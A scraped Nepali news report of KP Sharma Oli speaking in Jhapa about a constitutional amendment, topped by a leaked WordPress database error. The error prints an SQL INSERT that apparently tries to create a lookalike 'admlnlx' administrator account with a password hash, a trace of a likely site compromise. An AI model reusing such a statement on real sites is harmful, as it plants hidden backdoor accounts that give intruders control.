WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZbOgHVP1CQyCIMDAU9H96j27Vews21', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:14:40', '', 'admlnlx', 'admlnlx')
झापा,पुस १ –
प्रमुख प्रतिपक्षी दल नेकपा एमालेका अध्यक्ष केपी शर्मा ओलीले सरकारले चौका हानिरहँदा एमालेले छक्का हानिदिएको बताउनुभएको छ ।
विशेष कार्यक्रमका लागि शुक्रबार गृहजिल्ला झापा आइपुगेका पूर्व प्रधानमन्त्री ओलीले भद्रपुरस्थित विमानस्थलमा पत्रकारहरुसँग कुरा गर्दै संविधानमा संशोधन गर्न के का लागि भन्ने स्पष्ट खाका नआएकोले आफूहरुले विरोध जनाएको बताउनुभयो ।सविधान संशोधन भनेको के का लागि भनेर आफूहरुले खाका मागेको तर सरकारसँग त्यसको स्पष्ट जवाफ नभएकाले पनि आफूहरु संशकित भएको ओलीको भनाई छ ।
ओली आज नै झापा पृथ्वीनगरका जनप्रतिनिधि प्रदीप मेयाडे्बोको निधनमा समबेदना दिन झापा आउनु भएको हो । उहाँले आज झापाको विभिन्न स्थानमा राखिएको कार्यक्रमा समेत सम्बोधन गर्नुहुने एमाले झापाले जनाएको छ ।